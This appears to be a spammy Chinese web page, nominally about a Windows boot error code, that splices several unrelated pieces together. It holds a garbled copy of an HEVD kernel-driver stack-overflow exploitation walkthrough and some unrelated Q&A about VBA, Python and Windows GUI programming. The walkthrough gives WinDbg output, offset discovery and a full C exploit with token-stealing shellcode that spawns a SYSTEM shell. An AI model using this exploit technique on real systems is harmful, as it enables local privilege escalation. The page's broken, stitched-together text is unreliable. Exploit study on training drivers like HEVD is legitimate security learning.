网上科普有关“?bwin70xc000000e”话题很是火热,小编也是针对?bwin70xc000000e寻找了一些与之相关的一些信息进行分析,如果能碰巧解决你现在面临的问题,希望能够帮助到您。
bwin70xc000000e()HEVD -.sys?IDA
driverDriverEntry?driverIO? -\\Device\\HackSysExtremeVulnerableDriver?IRP?I/O handlerhandle?handler- ?IrpDeviceIoCtlHandler ? DriverObject MajorFunction 14?switchDeviceIoContrlIOCTL?
StackOverflowIoctlHandler ? handler?IOCTL
0x222003 ?DeviceIoControl?
StackOverflowIoctlHandler TriggerStackOverflow ? userBuffer ? kernelBuffer 2048 bytes memcpy?size ?userBufferSz ?kernelBuffer 2048 bytesmemcpy ?memcpy ?
Handler
WinDbg?uf HEVD!TriggerStackOverflow ?TriggerStackOverflow ?HEVD - ASLR?librarylibrary?.
0: kd> uf HEVD!TriggerStackOverflow
HEVD!TriggerStackOverflow [c:\hacksysextremevulnerabledriver\driver\stackoverflow.c @ 65]:
65 a11a462a 680c080000 push 80Ch
65 a11a462f 68d8211aa1 push offset HEVD!__safe_se_handler_table+0xc8 (a11a21d8)
[...]
92 a11a46be 83c430 add esp,30h
94 a11a46c1 eb21 jmp HEVD!TriggerStackOverflow+0xba (a11a46e4)
HEVD!TriggerStackOverflow+0xba [c:\hacksysextremevulnerabledriver\driver\stackoverflow.c @ 98]:
98 a11a46e4 c745fcfeffffff mov dword ptr [ebp-4],0FFFFFFFEh
100 a11a46eb 8bc7 mov eax,edi
101 a11a46ed e867c9ffff call HEVD!__SEH_epilog4 (a11a1059)
101 a11a46f2 c20800 ret 8
ret?ret?ASLR
0: kd> ? a11a46f2 - HEVD!TriggerStackOverflow
Evaluate expression: 200 = 000000c8
ret?0xc8?0: kd> bu HEVD!TriggerStackOverflow+c8
g
handler?CreateFileDriverEntry DestinationStringmemcpy VirtualAllocpage?shell code?shell code?2cpu?shellcode
A?RtlFillMemory(uBuffer, PAGE_SIZE, 0x41);
DeviceIOControl
TriggerStackOverflow TriggerStackOverflowret? KernelBuffer Size ? UserBuffer Size DeviceIoControl
View->Memory ?WinDbgesp
0x41414141debruijn sequencepwntools?CTF?python script?Python
In [1]: cyclic(0x864)
Out[1]: 'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaaza...'
userBuffer
char myStr[] = \"aaaabaaacaaada...avlaav\";
RtlCopyMemory(uBuffer, myStr, 0x864);
In [2]: cyclic_find(0x75616175)
Out[2]: 2080
2080bytesShell codeshell?
shell
shellcodewin7SMEP/SMAP ?shellcode?pagebitpageshellcodememcpy?
win7?shellcodeuserBuffer?
DeviceIoControl ?cmd.exe? shell#include
#include
#include
#include
/*
HEVD Windows Driver Exploit for the Stack Buffer Overflow
Written by glem - have fun :)
*/
#define PAGE_SIZE 4096
#define SHELLCODE_LEN 61
#define RET_OFFSET 2080
#define STACK_IOCTL 0x222003
#define DRIVER_PATH \"\\\\.\\HackSysExtremeVulnerableDriver\"
void main() {
/*
HANDLE WINAPI CreateFile(
_In_ LPCTSTR lpFileName,
_In_ DWORD dwDesiredAccess,
_In_ DWORD dwShareMode,
_In_opt_ LPSECURITY_ATTRIBUTES lpSecurityAttributes,
_In_ DWORD dwCreationDisposition,
_In_ DWORD dwFlagsAndAttributes,
_In_opt_ HANDLE hTemplateFile
);
*/
HANDLE device = CreateFileA(DRIVER_PATH,
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED,
NULL);
if (device == INVALID_HANDLE_VALUE) {
printf(\"[!] Error opening the driver\n\");
exit(1);
}
/*
LPVOID WINAPI VirtualAlloc(
_In_opt_ LPVOID lpAddress,
_In_ SIZE_T dwSize,
_In_ DWORD flAllocationType,
_In_ DWORD flProtect
);
*/
LPVOID uBuffer = VirtualAlloc(NULL,
PAGE_SIZE,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
if (!uBuffer) {
printf(\"Error allocating the user buffer\n\");
exit(1);
}
printf(\"[~] uBuffer @ %p\n\", uBuffer);
/*
VOID RtlCopyMemory(
_Out_ VOID UNALIGNED *Destination,
_In_ const VOID UNALIGNED *Source,
_In_ SIZE_T Length
);
*/
char shellcode[] =
/* --- Setup --- */
\"\x60\" // pushad
\"\x64\xA1\x24\x01\x00\x00\" // mov eax, fs:[KTHREAD_OFFSET]
\"\x8B\x40\x50\" // mov eax, [eax + EPROCESS_OFFSET]
\"\x89\xC1\" // mov ecx, eax (Current _EPROCESS structure)
\"\x8B\x98\xF8\x00\x00\x00\" // mov ebx, [eax + TOKEN_OFFSET]
/* --- Copy System token */
\"\xBA\x04\x00\x00\x00\" // mov edx, 4 (SYSTEM PID)
\"\x8B\x80\xB8\x00\x00\x00\" // mov eax, [eax + FLINK_OFFSET]
\"\x2D\xB8\x00\x00\x00\" // sub eax, FLINK_OFFSET
\"\x39\x90\xB4\x00\x00\x00\" // cmp [eax + PID_OFFSET], edx
\"\x75\xED\" // jnz
\"\x8B\x90\xF8\x00\x00\x00\" // mov edx, [eax + TOKEN_OFFSET]
\"\x89\x91\xF8\x00\x00\x00\" // mov [ecx + TOKEN_OFFSET], edx
/* --- Cleanup --- */
\"\x61\" // popad
\"\x31\xC0\" // NTSTATUS -> STATUS_SUCCESS
\"\x5D\" // pop ebp
\"\xC2\x08\x00\"; // ret 8
RtlCopyMemory(uBuffer, shellcode, SHELLCODE_LEN);
/* set return ptr to shellcode */
uint32_t *ret_Addr = (uint32_t *) (uBuffer + RET_OFFSET);
*ret_Addr = (uint32_t) uBuffer;
printf(\"[~] retAddr offset @ %p\n\", ret_Addr);
/*
BOOL WINAPI DeviceIoControl(
_In_ HANDLE hDevice,
_In_ DWORD dwIoControlCode,
_In_opt_ LPVOID lpInBuffer,
_In_ DWORD nInBufferSize,
_Out_opt_ LPVOID lpOutBuffer,
_In_ DWORD nOutBufferSize,
_Out_opt_ LPDWORD lpBytesReturned,
_Inout_opt_ LPOVERLAPPED lpOverlapped
);
*/
DWORD bytesRet;
BOOL bof = DeviceIoControl(device, /* handler for open driver */
STACK_IOCTL, /* IOCTL for the stack overflow */
uBuffer, /* our user buffer with shellcode/retAddr */
RET_OFFSET+4, /* want up to the offset + 4 (for the retAddr) sent */
NULL, /* no buffer for the driver to write back to */
0, /* above buffer of size 0 */
&bytesRet, /* dump variable for byte returned */
NULL); /* ignore overlap */
/* check if the device IO sent fine! */
if (!bof) {
printf(\"[!] Error with DeviceIoControl\n\");
exit(1);
} else {
printf(\"[*] Success!! Enjoy your shell!\n\");
}
/* pop a shell! */
system(\"cmd.exe\");
}
shellcode?
wx_rd.cheung ?求大神解答 1.windows编程和Gui什么关系 2.vb编图形界面和codeblocks 编图形界面有什么区别,谢谢
纯办公来说的话,vba更实用,VBA是Office系列自带的宏语言,与Python、VSTO和RPA最大的优势就是不需要单独安装IDE(集成开发环境),可以直接在Excel中编写。VBA比较适合非IT专业的人员入门编程,除了不需要单独装IDE以外,VBA在调试的过程中是可以一边调试一边修改代码的,虽然只能改断点之后的代码,但是在日常学习中也已经比较方便了。
Python的优势是类库比较丰富,语法很简洁。ython能做的有很多,工作中对数据的处理,都可以脱离Excel用Python来做。基本上除了Excel插件之外,都可以用Python来处理。
扩展资料
VBA是基于 Visual basic发展而来的,与VB具有相似的语言结构。从语言结构上讲,VBA是VB的一个子集,它们的语法结构是一样的。两者的开发环境也几乎相同。但是,VB是独立的开发工具,它不需要依附于任何其他应用程序,它有自己完全独立的工作环境和编译、链接系统。
VBA却没有自己独立的工作环境,它必须依附于某一个主应用程序,VBA专门用于Office的各应用程序中,如Word、 Excel、 Access等。在 Access中,可以通过VBA编写模块来满足特定的需要。
Windows编程指的是学习WInAPI或MFC,包含Windows下的GUI程序,也包含socket编程等其他。
VB源于Basic,即使IDE,又是语言,提供方便的GUI设计功能。
Code::Blocks只是IDE,一般用来写C/C++,当然也可以写Python什么的但不方便。
在Code::Blocks下写GUI程序,完全取决于你所使用的工具。
你可以在CB中写WinAPI甚至MFC程序,也可以使用其他库来设计界面。
CB本身的界面是wxWidgets做的,wx有众多语言绑定,CB用的是C++库。CB提供的wxSmith等UI设计工具也是针对wx的。
C做界面在Windows下只能用WinAPI。虽然GTK+也是C也有Win版,但十分不足。
关于“?bwin70xc000000e”这个话题的介绍,今天小编就给大家分享完了,如果对你有所帮助请保持对本站的关注!
本文来自作者[采菡]投稿,不代表小熊号立场,如若转载,请注明出处:https://xx-scm.com/cshi/202606-178590.html
评论列表(4条)
我是小熊号的签约作者“采菡”!
希望本篇文章《-bwin70xc000000e》能对你有所帮助!
本站[小熊号]内容主要涵盖:国足,欧洲杯,世界杯,篮球,欧冠,亚冠,英超,足球,综合体育
本文概览:网上科普有关“?bwin70xc000000e”话题很是火热,小编也是针对?bwin70xc000000e寻找了一些与之相关的一些信息进行分析,如果能碰巧解决你现在面临的问题,...